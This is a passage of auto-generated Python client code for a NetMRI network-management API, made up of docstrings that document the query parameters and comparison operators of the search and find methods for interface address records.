:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against if addrs, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: AciBdID, AciEpgID, AddrChangedCols, AddrEndTime, AddrStartTime, AddrTimestamp, DataSourceID, DeviceID, IfAddrID, InterfaceID, SubnetIPDotted, SubnetIPNumeric, ifIPDotted, ifIPNumeric, ifIndex, ifNetMaskDotted, ifNetMaskNumeric.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available if addrs matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: AciBdID, AciEpgID, AddrChangedCols, AddrEndTime, AddrStartTime, AddrTimestamp, DataSourceID, DeviceID, IfAddrID, InterfaceID, SubnetIPDotted, SubnetIPNumeric, ifIPDotted, ifIPNumeric, ifIndex, ifNetMaskDotted, ifNetMaskNumeric.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AciBdID: The operator to apply to the field AciBdID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AciBdID: ID of ACI bridge domain the device is assigned to For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AciBdID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AciBdID: If op_AciBdID is specified, the field named in this input will be compared to the value in AciBdID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AciBdID must be specified if op_AciBdID is specified.
:type val_f_AciBdID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AciBdID: If op_AciBdID is specified, this value will be compared to the value in AciBdID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AciBdID must be specified if op_AciBdID is specified.
:type val_c_AciBdID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AciEpgID: The operator to apply to the field AciEpgID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AciEpgID: ID of ACI EPG the device is assigned to For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AciEpgID: If op_AciEpgID is specified, the field named in this input will be compared to the value in AciEpgID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AciEpgID must be specified if op_AciEpgID is specified.
:type val_f_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AciEpgID: If op_AciEpgID is specified, this value will be compared to the value in AciEpgID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AciEpgID must be specified if op_AciEpgID is specified.
:type val_c_AciEpgID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrChangedCols: The operator to apply to the field AddrChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrChangedCols: If op_AddrChangedCols is specified, the field named in this input will be compared to the value in AddrChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrChangedCols must be specified if op_AddrChangedCols is specified.
:type val_f_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrChangedCols: If op_AddrChangedCols is specified, this value will be compared to the value in AddrChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrChangedCols must be specified if op_AddrChangedCols is specified.
:type val_c_AddrChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrEndTime: The operator to apply to the field AddrEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrEndTime: If op_AddrEndTime is specified, the field named in this input will be compared to the value in AddrEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrEndTime must be specified if op_AddrEndTime is specified.
:type val_f_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrEndTime: If op_AddrEndTime is specified, this value will be compared to the value in AddrEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrEndTime must be specified if op_AddrEndTime is specified.
:type val_c_AddrEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrStartTime: The operator to apply to the field AddrStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrStartTime: If op_AddrStartTime is specified, the field named in this input will be compared to the value in AddrStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrStartTime must be specified if op_AddrStartTime is specified.
:type val_f_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrStartTime: If op_AddrStartTime is specified, this value will be compared to the value in AddrStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrStartTime must be specified if op_AddrStartTime is specified.
:type val_c_AddrStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AddrTimestamp: The operator to apply to the field AddrTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AddrTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AddrTimestamp: If op_AddrTimestamp is specified, the field named in this input will be compared to the value in AddrTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AddrTimestamp must be specified if op_AddrTimestamp is specified.
:type val_f_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AddrTimestamp: If op_AddrTimestamp is specified, this value will be compared to the value in AddrTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AddrTimestamp must be specified if op_AddrTimestamp is specified.
:type val_c_AddrTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IfAddrID: The operator to apply to the field IfAddrID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IfAddrID: If op_IfAddrID is specified, the field named in this input will be compared to the value in IfAddrID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IfAddrID must be specified if op_IfAddrID is specified.
:type val_f_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IfAddrID: If op_IfAddrID is specified, this value will be compared to the value in IfAddrID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IfAddrID must be specified if op_IfAddrID is specified.
:type val_c_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SubnetIPDotted: The operator to apply to the field SubnetIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SubnetIPDotted: If op_SubnetIPDotted is specified, the field named in this input will be compared to the value in SubnetIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SubnetIPDotted must be specified if op_SubnetIPDotted is specified.
:type val_f_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SubnetIPDotted: If op_SubnetIPDotted is specified, this value will be compared to the value in SubnetIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SubnetIPDotted must be specified if op_SubnetIPDotted is specified.
:type val_c_SubnetIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_SubnetIPNumeric: The operator to apply to the field SubnetIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. SubnetIPNumeric: The numerical value of the network portion of the IP address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_SubnetIPNumeric: If op_SubnetIPNumeric is specified, the field named in this input will be compared to the value in SubnetIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_SubnetIPNumeric must be specified if op_SubnetIPNumeric is specified.
:type val_f_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_SubnetIPNumeric: If op_SubnetIPNumeric is specified, this value will be compared to the value in SubnetIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_SubnetIPNumeric must be specified if op_SubnetIPNumeric is specified.
:type val_c_SubnetIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_deprovisioning_ipv4_ind: The operator to apply to the field cap_if_net_deprovisioning_ipv4_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_deprovisioning_ipv4_ind: Capability of de-provisioning an ipv4 network from this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_deprovisioning_ipv4_ind: If op_cap_if_net_deprovisioning_ipv4_ind is specified, the field named in this input will be compared to the value in cap_if_net_deprovisioning_ipv4_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_deprovisioning_ipv4_ind must be specified if op_cap_if_net_deprovisioning_ipv4_ind is specified.
:type val_f_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_deprovisioning_ipv4_ind: If op_cap_if_net_deprovisioning_ipv4_ind is specified, this value will be compared to the value in cap_if_net_deprovisioning_ipv4_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_deprovisioning_ipv4_ind must be specified if op_cap_if_net_deprovisioning_ipv4_ind is specified.
:type val_c_cap_if_net_deprovisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_deprovisioning_ipv6_ind: The operator to apply to the field cap_if_net_deprovisioning_ipv6_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_deprovisioning_ipv6_ind: Capability of de-provisioning an ipv6 network from this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_deprovisioning_ipv6_ind: If op_cap_if_net_deprovisioning_ipv6_ind is specified, the field named in this input will be compared to the value in cap_if_net_deprovisioning_ipv6_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_deprovisioning_ipv6_ind must be specified if op_cap_if_net_deprovisioning_ipv6_ind is specified.
:type val_f_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_deprovisioning_ipv6_ind: If op_cap_if_net_deprovisioning_ipv6_ind is specified, this value will be compared to the value in cap_if_net_deprovisioning_ipv6_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_deprovisioning_ipv6_ind must be specified if op_cap_if_net_deprovisioning_ipv6_ind is specified.
:type val_c_cap_if_net_deprovisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_provisioning_ipv4_ind: The operator to apply to the field cap_if_net_provisioning_ipv4_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_provisioning_ipv4_ind: Capability to provision an ipv4 network on this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_provisioning_ipv4_ind: If op_cap_if_net_provisioning_ipv4_ind is specified, the field named in this input will be compared to the value in cap_if_net_provisioning_ipv4_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_provisioning_ipv4_ind must be specified if op_cap_if_net_provisioning_ipv4_ind is specified.
:type val_f_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_provisioning_ipv4_ind: If op_cap_if_net_provisioning_ipv4_ind is specified, this value will be compared to the value in cap_if_net_provisioning_ipv4_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_provisioning_ipv4_ind must be specified if op_cap_if_net_provisioning_ipv4_ind is specified.
:type val_c_cap_if_net_provisioning_ipv4_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_cap_if_net_provisioning_ipv6_ind: The operator to apply to the field cap_if_net_provisioning_ipv6_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. cap_if_net_provisioning_ipv6_ind: Capability to provision an ipv6 network on this interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_cap_if_net_provisioning_ipv6_ind: If op_cap_if_net_provisioning_ipv6_ind is specified, the field named in this input will be compared to the value in cap_if_net_provisioning_ipv6_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_cap_if_net_provisioning_ipv6_ind must be specified if op_cap_if_net_provisioning_ipv6_ind is specified.
:type val_f_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_cap_if_net_provisioning_ipv6_ind: If op_cap_if_net_provisioning_ipv6_ind is specified, this value will be compared to the value in cap_if_net_provisioning_ipv6_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_cap_if_net_provisioning_ipv6_ind must be specified if op_cap_if_net_provisioning_ipv6_ind is specified.
:type val_c_cap_if_net_provisioning_ipv6_ind: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIPDotted: The operator to apply to the field ifIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIPDotted: If op_ifIPDotted is specified, the field named in this input will be compared to the value in ifIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIPDotted must be specified if op_ifIPDotted is specified.
:type val_f_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIPDotted: If op_ifIPDotted is specified, this value will be compared to the value in ifIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIPDotted must be specified if op_ifIPDotted is specified.
:type val_c_ifIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIPNumeric: The operator to apply to the field ifIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIPNumeric: The numerical value of the IP address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIPNumeric: If op_ifIPNumeric is specified, the field named in this input will be compared to the value in ifIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIPNumeric must be specified if op_ifIPNumeric is specified.
:type val_f_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIPNumeric: If op_ifIPNumeric is specified, this value will be compared to the value in ifIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIPNumeric must be specified if op_ifIPNumeric is specified.
:type val_c_ifIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifIndex: The operator to apply to the field ifIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifIndex: The SNMP interface index of the interface configured with this address. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifIndex: If op_ifIndex is specified, the field named in this input will be compared to the value in ifIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifIndex must be specified if op_ifIndex is specified.
:type val_f_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifIndex: If op_ifIndex is specified, this value will be compared to the value in ifIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifIndex must be specified if op_ifIndex is specified.
:type val_c_ifIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifNetMaskDotted: The operator to apply to the field ifNetMaskDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifNetMaskDotted: If op_ifNetMaskDotted is specified, the field named in this input will be compared to the value in ifNetMaskDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifNetMaskDotted must be specified if op_ifNetMaskDotted is specified.
:type val_f_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifNetMaskDotted: If op_ifNetMaskDotted is specified, this value will be compared to the value in ifNetMaskDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifNetMaskDotted must be specified if op_ifNetMaskDotted is specified.
:type val_c_ifNetMaskDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ifNetMaskNumeric: The operator to apply to the field ifNetMaskNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ifNetMaskNumeric: The numerical value of the network mask. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ifNetMaskNumeric: If op_ifNetMaskNumeric is specified, the field named in this input will be compared to the value in ifNetMaskNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ifNetMaskNumeric must be specified if op_ifNetMaskNumeric is specified.
:type val_f_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ifNetMaskNumeric: If op_ifNetMaskNumeric is specified, this value will be compared to the value in ifNetMaskNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ifNetMaskNumeric must be specified if op_ifNetMaskNumeric is specified.
:type val_c_ifNetMaskNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_network_id: The operator to apply to the field network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. network_id: The Network View ID assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_network_id: If op_network_id is specified, the field named in this input will be compared to the value in network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_network_id must be specified if op_network_id is specified.
:type val_f_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_network_id: If op_network_id is specified, this value will be compared to the value in network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_network_id must be specified if op_network_id is specified.
:type val_c_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_description: The operator to apply to the field vrf_description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_description: The VRF description of the vrf assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_description: If op_vrf_description is specified, the field named in this input will be compared to the value in vrf_description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_description must be specified if op_vrf_description is specified.
:type val_f_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_description: If op_vrf_description is specified, this value will be compared to the value in vrf_description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_description must be specified if op_vrf_description is specified.
:type val_c_vrf_description: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_name: The operator to apply to the field vrf_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_name: The VRF name assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_name: If op_vrf_name is specified, the field named in this input will be compared to the value in vrf_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_name must be specified if op_vrf_name is specified.
:type val_f_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_name: If op_vrf_name is specified, this value will be compared to the value in vrf_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_name must be specified if op_vrf_name is specified.
:type val_c_vrf_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_vrf_rd: The operator to apply to the field vrf_rd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. vrf_rd: The VRF route distinguisher of the vrf assigned to the interface. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_vrf_rd: If op_vrf_rd is specified, the field named in this input will be compared to the value in vrf_rd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_vrf_rd must be specified if op_vrf_rd is specified.
:type val_f_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_vrf_rd: If op_vrf_rd is specified, this value will be compared to the value in vrf_rd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_vrf_rd must be specified if op_vrf_rd is specified.
:type val_c_vrf_rd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
